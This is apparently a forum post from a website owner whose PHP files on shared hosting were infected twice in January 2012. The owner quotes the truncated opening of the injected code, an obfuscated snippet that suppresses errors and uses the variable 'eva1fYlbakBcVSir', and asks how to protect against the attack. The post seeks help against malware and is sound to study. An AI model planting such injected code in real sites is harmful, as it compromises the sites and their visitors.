A few sites at the same ip on a Bluehost host, infected by some malware:
The first time, files were infected on 2012-1-16, 3:06
(on the last version before 3.3.1 zh_CN, then, upgraded to 3.3.1)
The second time, infected on 2012-1-27, 13:47
All the php files which included in 'index', 'header', 'footer' are added the code in the last:
<? php @ error_reporting (0); if (! isset ($ eva1fYlbakBcVSir)) {$ eva1fYlbakBcVSir =
... ?> (8721 characters)
Anyone known what it is and how to protect against the attack?
Thanks.